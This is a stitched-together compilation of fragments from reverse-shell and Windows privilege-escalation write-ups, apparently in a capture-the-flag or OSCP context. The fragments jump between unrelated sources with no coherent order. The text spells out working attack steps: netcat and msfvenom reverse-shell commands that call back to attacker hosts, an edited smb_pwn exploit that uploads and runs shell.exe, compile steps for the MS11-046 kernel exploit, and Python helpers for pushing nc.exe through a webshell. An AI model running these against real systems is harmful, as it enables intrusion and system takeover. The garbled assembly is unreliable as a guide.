A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. When it receives the connection, the attacking machine is then able to execute commands on the victim computer. There are many guides and cheatsheets when it comes to reverse shells, so I won't dive too deep into the subject. Here's a shorter, feature-free version of the perl-reverse-shell. There's also an alternative Perl reverse shell here.

To start out, let's run an nmap scan to see what ports are open on the box.

I generated the payload with Veil but needed a way to transfer the file to the Windows server running ColdFusion through simple commands. TFTP is one option.

SMB is a Microsoft protocol. The Windows SMB version number is not what you are looking for; what you are looking for is the features that your SMB version supports. On your platform (Windows 7), SMB3 is not supported (one of its main features is encryption).

Let's run whoami to see what rights we have.

python smbserver.py share smb

With our SMB server in place hosting the Windows binary for Netcat, we're almost ready to instruct the webserver to connect to us.

On the Meterpreter session, we type the command shell to drop into a Windows shell on the Windows 10 target.

Staged vs. Unstaged Payloads. You … In this instance, I'm using an unstaged TCP reverse shell, with LHOST set to 1.2.3.4 and LPORT set to 1234. Then we will set up a listener to intercept the reverse shell using msfconsole and the exploit/multi/handler module.

The enumeration script mentioned earlier can also enumerate stored credentials and dump them to a file.

Secondly, the current version of Watson is not compatible with Windows 7.

OSCP Windows PrivEsc - Part 1 (5 minute read). As stated in the OSCP Review post, I came across many good resources for Linux privilege escalation, but there were just a few for Windows.
MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)

I started a quick tcpdump to capture ICMP requests to/from my VPN connection using the command below, and then executed the ping command in our webshell.

tcpdump -i tun0 -n icmp

I'm rating this as an easy box, since the privilege escalation piece was simple when utilizing a kernel exploit, and the initial way in isn't super realistic.

Now start your bind or reverse shell.

In this writeup, we will take a look at file transfer over SMB and HTTP, how to migrate to PowerShell from a standard cmd shell, and lpeworkshop …

Text.txt on Windows XP SP1 is deleted.

Back in our reverse shell, let's query the registry to see what version of .NET we're running.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

I created an aspx payload through msfvenom, but I was unable to get a reverse shell this way. Finally, I found Kali has a built-in aspx webshell located in our webshells directory.

This is the command I use, but you can use whatever you like best.

wsl whoami

nmap -T4 -sV -sC 10.10.10.5 -oA /nmap

From the output of the scan, we see that FTP on port 21 is open to anonymous login.

So, how do we tunnel SMB over SSH and keep local file sharing working?

It is not uncommon during internal penetration tests to discover a file share which contains sensitive information such as plain-text passwords and database connection strings.

Most Windows versions, old and new, offer a command line FTP client by default.
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.4 LPORT=443 -f exe > shell.exe

Then modify the code so it will upload and run our exploit as shown below:

def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()
    # upload shell.exe to the C$ share as \test.exe, then start it as a service
    smb_send_file(smbConn, 'shell.exe', 'C', '/test.exe')
    service_exec(conn, r'c:\test.exe')

SMB is a protocol for file sharing.

After researching each one, I decided to try out MS11-046.

Now we can set any of the best payloads, let's say windows/shell_reverse_tcp, by using the command below.

Therefore, we have to run it with sudo. All communication takes place over port tcp/445 and, depending on the selected payload, may utilize other (chosen) ports as well, e.g. for a reverse shell.

I chose to try hosting my own SMB server first.

Windows clients use WS-Discovery to discover the presence of SMB servers, but depending on the version of the Windows client, network discovery may be disabled by default.

This is a two part process. Both of these shell options require that commands be run on the remote host, so …

Metasploit can pair any Windows exploit with any Windows payload such as bind or reverse TCP.

At the C:\WINDOWS\system32> prompt, we issue the net users command.

The reverse shell made our target machine connect back to the attacking machine (Kali Linux), providing a shell connection directly to the Windows operating system.

It's a lot more sophisticated than CMD, the old DOS-style command prompt found in nearly every version of Windows. However, the ftp.exe utility on Windows is an interactive program.

If all goes well, we should receive a reverse shell back.

\\10.10.14.45\share\nc.exe -e cmd.exe 10.10.14.45 8080

We also see that there are some files present: iisstart.html and welcome.png.

Reverse TCP vs. Bind TCP shell.
In a Windows environment, the LM/NTLM hash is used to authenticate to the remote server instead of the plaintext password: the challenge-response the client sends is derived from the hash, which is why the hash alone is enough to authenticate. Let's look at a quick example of how to do this.

You can download the tool from https://github.com/rasta-mouse/Watson.

Metasploit has a large collection of payloads designed for all kinds of scenarios.

Reverse shell.

I need to access the SMB share in the Windows file browser as follows: \\192.168.0.3\

Hosting PHP Web Shell in SMB Sharing.

nc -nvlp 8080

Everything's set up!

To do this, we will use the command line tool msfvenom. There are tons of cheatsheets out there, but I couldn't find a comprehensive one that includes non-Meterpreter shells.

SMB is a protocol which is widely used across organisations for file sharing purposes.

So we've got the ability to execute commands on the system.

Windows Server 2012 R2 & 2016: PowerShell method (Remove-WindowsFeature FS-SMB1). Windows 8.1 and Windows 10: Add or Remove Programs method.

Let's view the source code to get an idea of how the exploit works.

The throttle limit applies only to the current cmdlet, not to the session or to the computer.

We will generate a reverse shell payload, execute it on a remote system, and get our shell.

In this tutorial we'll be setting up a reverse shell payload on the USB Rubber Ducky that'll execute in just 3 seconds.
Usually, this command will also return a list of installed patches, but nothing was returned here.

The latest .NET version installed on our victim is 3.5, so this is what we'll select.

Kali has a built-in SMB server through a Python script.

This was a simple box, but I did run into a curve-ball when getting my initial foothold.

This custom interactive shell will allow you to execute system commands through cmd.exe on Windows, or /bin/sh on UNIX machines.

ubuntun1604.exe config --default ...

auxiliary/admin/smb/ms17_010_command   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010     MS17-010 SMB RCE Detection
exploit/windows/smb/…

IIS runs code in asp/aspx, so my next thought was to create an asp/aspx payload to get a reverse shell connection. So we found that we can upload our own webpage to this IIS webserver, and then execute that webpage by browsing to it. Let's find the webshell on our system and copy it to our present working directory.

PAYLOAD => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit

This means we'll need to dig through the commits on the GitHub repository to download the original release of the application if we want to run it on our target machine.

First, let's find the actual payload part of the exploit in the code.

[*] Started reverse TCP handler on 173.18.131.94:4444
[*] Connecting to the server…
[*] Authenticating to 173.18.131.111:445|test as user 'administrator'…

First we will generate a reverse shell payload with MSFvenom.
Basically, a virtual network adapter is a software application that allows a computer to connect to a network. We're going to add a virtual adapter to our Windows computer and create an SSH tunnel over the virtual interface.

What I use this payload for is to add a local administrator to the machine.

The result will be a reverse shell on a Windows 7 machine using Empire & Meterpreter.

We also need to adjust the architecture to match our victim machine.

If this parameter is omitted or a value of 0 is entered, then Windows PowerShell® calculates an optimum throttle limit for the cmdlet based on the number of CIM cmdlets that are running on the computer.

Let's get some information about the computer to see what we're working with.

The purpose of a reverse shell is simple: to get a shell. It used to …

Port 80 is open and running Microsoft IIS 7.5, a webserver.

Besides, the SMBv1 protocol is supported in Windows 10. There is a good article talking about how to determine the SMB version: Windows Server 2012 R2: Which version of the SMB protocol (SMB 1.0, SMB 2.0, SMB 2.1, SMB 3.0 or SMB 3.02) are you using?

Once executed, you will be provided with a remote shell.

This FTP client can be leveraged to transfer files between victim and attacker.
For some reason, even though you are uploading an .exe, the ftp command seems to default to ASCII mode.

The 3 Second Reverse Shell with a USB Rubber Ducky.

This "reverse" SERVER method requires Keimpx to be run with root privileges so that it can spawn the SMB server on a privileged port, tcp/445 (note: a privileged port is any port below 1024).

The attacking computer typically listens on a specific port. It can create a reverse TCP connection to our machine. This can be anything from a reverse shell via PowerShell, launching the calculator, killing Minesweeper… you get the drift.

I'm attempting to do my first pen test with the Blue machine (10.10.10.40).

Let's spin up the server to a fileshare named "share" using the following command.

2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP2 English (NO NX)
9 Windows 2003 SP2 English (NX)

In this example, you can see that the exploit lists Automatic Targeting as one option.

PSA: run these commands via cmd.exe, not in PowerShell. In … PowerShell output seems to do some sort of encoding that will generate an invalid PE file when you redirect the output to a file, but running these under cmd.exe works correctly.

Let's head back to the cmdasp webshell and run the following command.

To check the maximum protocol setting you can use the shell command as shown before, or check Microsoft Networking -> Advanced Settings for the current settings:

This is a super awesome tool, but there are a couple of caveats.

Generally, while abusing HTTP services or other programs, we get an RCE vulnerability.
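The ASCII-mode corruption and the "ftp.exe is interactive" problem are two halves of the same transfer step, so here is one added example (my code, not the author's) that covers both: it builds the ftp.exe command file that a one-command-at-a-time webshell can drive, forces binary mode before the transfer, and checks that ordering. Assumed values: an FTP server on the attacker box at 10.10.14.45 accepting anonymous/anonymous, nc.exe as the file, and C:\Windows\Temp as a writable path on the victim.

```python
# Added example: generate an ftp.exe script for a non-interactive shell and
# verify that the transfer is switched to binary before the .exe moves.
# (ASCII mode is what turns nc.exe into "This program cannot be run in DOS mode".)

SCRIPT_PATH = r"C:\Windows\Temp\ftp.txt"   # assumed writable location on the victim


def ftp_script(host, user, password, filename, direction="get"):
    """Lines of an ftp.exe script for use with 'ftp -n -s:<file>'.
    -n disables auto-login, so the credentials go in an explicit 'user' line."""
    if direction not in ("get", "put"):
        raise ValueError("direction must be 'get' or 'put'")
    return [
        f"open {host}",
        f"user {user} {password}",
        "binary",                    # must come before the transfer
        f"{direction} {filename}",
        "bye",                       # without this ftp.exe waits for input forever
    ]


def transfer_is_binary(lines):
    """True only if 'binary' (or 'bin') appears before the first get/put."""
    for line in lines:
        word = line.split(" ", 1)[0].lower()
        if word in ("binary", "bin"):
            return True
        if word in ("get", "put"):
            return False
    return False


def webshell_commands(lines, path=SCRIPT_PATH):
    """One cmd.exe command per line: write the script with echo, then run it.
    The first line uses > to create the file, the rest append with >>."""
    cmds = [f"echo {lines[0]} >{path}"]
    cmds += [f"echo {line} >>{path}" for line in lines[1:]]
    cmds.append(f"ftp -v -n -s:{path}")
    return cmds


if __name__ == "__main__":
    script = ftp_script("10.10.14.45", "anonymous", "anonymous", "nc.exe")
    if not transfer_is_binary(script):
        raise SystemExit("refusing to build a script that would corrupt the binary")
    print("\n".join(webshell_commands(script)))
```

Paste the printed lines one at a time into the webshell; the last one runs ftp.exe with -s so it reads every prompt answer from the file and exits on bye instead of hanging the non-interactive shell. Start a Python FTP server (for example python3 -m pyftpdlib) in the directory holding nc.exe on the attacker side first.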
However, even if a file share doesn't contain any data that could be used to connect…

No matter what I tried, I kept running into an error: "This program cannot be run in DOS mode".

set payload windows/shell_reverse_tcp

8) Setting up payload options before exploitation:

show options

So, in order for this to work, the remote system has to be able to reach us on port tcp/445.

Let's open a browser and see what we see at that page.

Turning Command Execution to Reverse Shell.

This article will help those who play with CTF challenges, because today we will discuss "Windows One-Liners": using malicious commands such as PowerShell or rundll32 to get a reverse shell on a Windows system.

Finally, we will inject the reverse shell DLL with DoublePulsar, which will initiate the reverse shell from the Windows 2003 server host to the Kali Linux attack box. As an example, I used the EternalBlue exploit to get a simple command shell with local SYSTEM rights on a Windows configuration that didn't have the latest updates.

SMB server: transferring files to the target machine over SMB is particularly useful when we already have a reverse shell on Windows.

Pass the Hash.

First, it's written in C#.

A reverse shell is a type of shell where the victim computer calls back to an attacker's computer.

The output confirms that our box received a ping request from the webserver. Great!
gedit 40564.c

Using those instructions, let's compile the code.

i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32

Now that we have our privesc executable, let's move that into our SMB file-share so we can transfer it to the victim.

mv MS11-046.exe smb

We're going to use a virtual network adapter.

Alright cool, we see the page.

There are, of course, many other things you can do with valid Windows credentials.

Let's connect with the FTP client and see if we can add files to the website.

echo Hello > test.txt
ftp 10.10.10.5
anonymous
anonymous
put test.txt

Now let's attempt to browse to our test file: http://10.10.10.5/test.txt

We see a TON of exploits available on this box.

Most Windows systems have this port open by default (Linux hosts only expose it when running Samba), with unsecured shares and unpatched systems unknowingly exposed to everyone that wants to know.

Let's go into Build, and launch Configuration Manager.

Moves the reverse shell executable to the web root directory so the file can be accessed remotely over HTTP and SMB.

Then, it uses the native Windows SMB functionality to execute the supplied command on the remote Windows system while redirecting its output onto our writable network share.

A quick whoami command confirms that we now have full SYSTEM access.

Using the shell.
In a reverse shell we open a connection from the victim server to the attacker's machine.

Let's locate that and copy it into our current working directory.

cp /usr/share/doc/python-impacket/examples/smbserver.py .

How to gracefully remove SMB v1 in Windows 8.1, Windows 10, Windows 2012 R2, and Windows Server 2016. Windows Server 2012 R2 and Windows Server 2016: Server Manager method for disabling SMB.

Working with Payloads.

Back in our reverse shell, let's execute our payload.

\\10.10.14.45\share\MS11-046.exe

We see that we're now presented with a shell in the System32 directory.

Enter the above command in terminal to …

lpeworkshop, being one of those, lacks a good walkthrough.

Alright, so we're working with a 32-bit Windows 7 machine.

Useful netcat reverse shell examples. Don't forget to start your listener, or you won't be catching any shells :)

nc -lnvp 80
nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0</tmp/p | /bin/sh 1>/tmp/p

We also see that we've received a reverse shell in our Netcat listener!

An SMB relay attack is a type of attack which relies on NTLM authentication (version 2 is what is normally used in most companies).

But first, we must spin up a Netcat listener to catch the connection request.

We'll change the Configuration to Release, and the Platform to x86, the same as our victim machine. Finally, let's select the Build drop-down again and click Build Watson.

Target m/c → 192.168.1.134

The error can be resolved by setting the FTP mode to binary before uploading the nc.exe file; this saves you the hassle of setting up the SMB share and running it from there.

In case you can find a working pipe name or use credentials, creating a file on the target machine may not be that helpful for us.
It was a very limited, non-interactive shell, and I wanted to download and execute a reverse Meterpreter binary from my attack machine.

EternalBlue used in ransomware: since the EternalBlue exploits were leaked, the SMBv1 vulnerability has been used in a large number of ransomware attacks, such as WannaCry, Petya and NotPetya.

For more in-depth information I'd …

Looking at the results, we do see the SMB request in our terminal window hosting nc.exe.

The output at the bottom of the window should show you the file location this was built to.

One tip, however: you don't need to set up an SMB share to run nc.exe. The error you got when trying to run nc.exe directly was "This program cannot be run in DOS mode".

I'll name mine something simple, "smb".

mkdir smb

Now let's find the Windows binary for Netcat and copy it to this directory we just made.

cp /usr/share/windows-binaries/nc.exe smb

Looks like we've got everything in place!

We see that we're not SYSTEM, so our job isn't done yet. We're on the machine, but we don't have complete control of it yet.

Port 445 is a TCP port for Microsoft-DS SMB file sharing.

Netcat Reverse Shell.

Let's run a quick ping test to make sure we're able to communicate from this system to ours.

This means that we'll need to open Watson in Visual Studio, an application not available in Kali Linux. Now we know how to compile Watson.
Penetration testing tools cheat sheet: a quick reference, high-level overview for typical penetration testing engagements, designed to provide a high-level overview of the typical commands a third-party pen test company would run when performing a manual infrastructure penetration test.

Trivial File Transfer Protocol (TFTP) is another possibility if tftp is installed on the system.

In this case CrackMapExec spawns a local SMB server with a writable network share.

In order to use this SMB server, we need to first create a directory to host as a fileshare.

Let's modify the exploit code to get a reverse shell.

Unfortunately, when we are listening to what is going on in the network, we're able to capture a certain part of the traffic related to the authentication and also relay it to other servers.

My general process…

Perfect!

Table of Contents:
– Non-Meterpreter Binaries
– Non-Meterpreter Web Payloads
– Meterpreter Binaries
– Meterpreter Web Payloads

I will include both Meterpreter and non-Meterpreter shells for those studying for the OSCP.

set payload windows/x64/exec
The MS17-010 exploits (EternalBlue, EternalRomance, EternalChampion and EternalSynergy), which target flaws in Microsoft Windows Server Message Block (SMB) version 1, were believed to have been developed by the NSA and were leaked by the Shadow Brokers in April 2017.

Using PowerShell we can implement a netcat-like reverse shell.

Preparing for Remote Shell Access.

Attacker m/c → 192.168.1.129 (Kali Linux)

I set my Windows machine up with the Visual Studio Community edition, and opened Watson.sln from the GitHub page.

First of all, let's clear up what a reverse TCP shell is, what a bind shell is, and how they work.

So if we can't execute malicious code directly on the disk of the machine, how else can we get our code to run?

Here's an example of using the Metasploit psexec_psh method to spawn a reverse shell as local Administrator using a clear-text password:

Let's run dir to see if we actually have command execution, and if we do, what directory we're in.

As we can see, there are only two users, the Administrator and the l3s7r0z user. This lists all the users within the Windows machine.

Does this mean that the machine is missing all patches?

Step 1. Created my own malicious exe via msfvenom, transferred that to the box, and attempted to execute locally on the disk.

Enabling the SMB 1.0/CIFS Client and SMB 1.0/CIFS Server feature for non-legacy systems is not required, and Windows 10 can work with the QTS system.
The following special commands are supported: run_shell: drops you into a system shell (allowing you, for example, to change directories).

In this blog post we'll dig a little deeper and explore the post-exploitation possibilities of using a more advanced payload: the Meterpreter.

> vim /etc/samba/smb.conf

Samba configuration where the default SMB directory is set to /var/www/, browsable, read-only and guest access is allowed.

My thought was perhaps we could execute a malicious file from a network share, and load it straight into memory.

In both of these situations there is an attacker machine and a victim server.

Discoverability through broadcast protocols is a convenience feature and is not a requirement to access the SMB server.

This command can be used for generating payloads to be used in many locations and offers a variety of output options, from Perl to C to raw.

We also find that the author provides compiling instructions.

In this case, the Samba server IP is 192.168.0.3.

The website of the company Sniper Co.
is vulnerable to a Remote File Inclusion (RFI) through SMB. We will use it to include a PHP payload that will download Netcat on the server and start it to get a reverse PowerShell. Then we analyze the website source code and find the password of the database, which is the same as that of the Windows account of the user chris.

We'll need to make sure to compile Watson using the correct configuration for our target machine.

If we have administrator access on the Windows system, we can dump the hash from memory using tools like Windows …

Hi, thank you for the write-up, it was very helpful!

searchsploit ms11-046
locate exploits/windows_x86/local/40564.c
cp /usr/share/exploitdb/exploits/windows_x86/local/40564.c .

I've installed this on my Windows box.

PowerShell 1.0 was first released for Windows XP SP2 and Windows Vista as a separate download, and it has been included by default in Windows since Windows 7.

I like to use an online note taking platform called pentest.ws to store all of the reverse shell scripts and one-liners that I've collected.

Looking in the code, we can find a function called smb_pwn.

Specifies the maximum number of concurrent operations that can be established to run the cmdlet.

Surely there's some sort of old Win7 privilege escalation exploit that would work on an unpatched box. There's a tool called Watson that will scan a system to find any local privilege escalation exploits that may exist on a machine.

Scan the target machine and check for an open SMB port; in my case the target IP is 192.168.1.134.

Port 445 (SMB) is one of the most commonly attacked ports.

Remember how we saw that file on the FTP server from the nmap output? After viewing the page source, we see that the website is just pulling up welcome.png as the image.
We see that the box is running .NET 2.0, 3.0, and 3.5. Let's copy this down to our present working directory.

Windows does not have convenient commands to …

So, we can choose the MS08-067 vulnerability to exploit or open a command shell, as well as create an administrator account or start a remote VNC session on the victim computer.

Let's copy that over to our Kali machine, host it in the SMB fileshare directory, and then execute it on our victim the same way we did Netcat.

\\10.10.14.45\share\Watson.exe

So we have command execution and can communicate to/from the box, but how do we turn this into an interactive reverse shell?

Transferred the Windows binary for nc.exe and attempted to execute locally on the disk.

These are just my go-to methods for getting a quick shell.

That is great!

We'll need to adjust the Target Framework to match our target machine.
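Picking the Watson build settings comes down to two pieces of output the write-up already collects, systeminfo and the reg query of the NDP key, so here is an added example (my code, not the author's) that parses both and returns the Platform and Target Framework to select in Configuration Manager, plus how many hotfixes were listed. The two sample outputs are constructed to match what the text reports (32-bit Windows 7, no hotfixes, .NET 2.0/3.0/3.5); real systeminfo output has many more fields, and the parser also copes with the "[01]: KB..." hotfix list and the v4 key layout the text does not show.

```python
import re

# Added example: derive Watson's build settings from systeminfo and
# "reg query HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP" output.

# Constructed sample, modelled on the values the write-up reports.
SYSTEMINFO_SAMPLE = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 N/A
"""

# Constructed sample of the registry query's subkey listing.
REG_NDP_SAMPLE = """\
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\CDF
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v2.0.50727
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v3.0
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v3.5
"""


def parse_systeminfo(text):
    """OS name, build number, architecture and hotfix list from systeminfo output."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^([A-Za-z][^:]*):\s*(.*?)\s*$", line)
        if m:
            fields[m.group(1).strip()] = m.group(2)
    # Hotfixes appear one per line as "[01]: KB2534111"; "N/A" means none listed.
    hotfixes = re.findall(r"^\s*\[\d+\]:\s*(KB\d+)", text, re.M)
    build = re.search(r"\d+\.\d+\.\d+", fields.get("OS Version", ""))
    return {
        "os": fields.get("OS Name", ""),
        "build": build.group(0) if build else "",
        "arch": "x64" if "x64" in fields.get("System Type", "").lower() else "x86",
        "hotfixes": hotfixes,
    }


def parse_net_versions(text):
    """Sorted .NET versions from the NDP subkeys (v2.0.50727, v3.5, v4...)."""
    found = re.findall(r"\\NDP\\v(\d+(?:\.\d+)?)", text)
    return sorted(set(found), key=lambda v: tuple(int(p) for p in v.split(".")))


def watson_build_settings(systeminfo_text, reg_text):
    """Platform and Target Framework for Visual Studio's Configuration Manager."""
    info = parse_systeminfo(systeminfo_text)
    versions = parse_net_versions(reg_text)
    if not versions:
        raise ValueError("no .NET Framework keys found; Watson needs a .NET runtime")
    return {
        "platform": info["arch"],
        "target_framework": versions[-1],   # newest runtime present on the target
        "hotfixes_listed": len(info["hotfixes"]),
    }


if __name__ == "__main__":
    print(parse_systeminfo(SYSTEMINFO_SAMPLE))
    print(watson_build_settings(SYSTEMINFO_SAMPLE, REG_NDP_SAMPLE))
```

Run systeminfo and the reg query through the webshell, paste their output into the two strings, and the result tells you to build Release / x86 against .NET 3.5 for this box; the hotfix count of zero is the same signal the text reads from the empty patch list, namely that an old kernel exploit such as MS11-046 is worth trying.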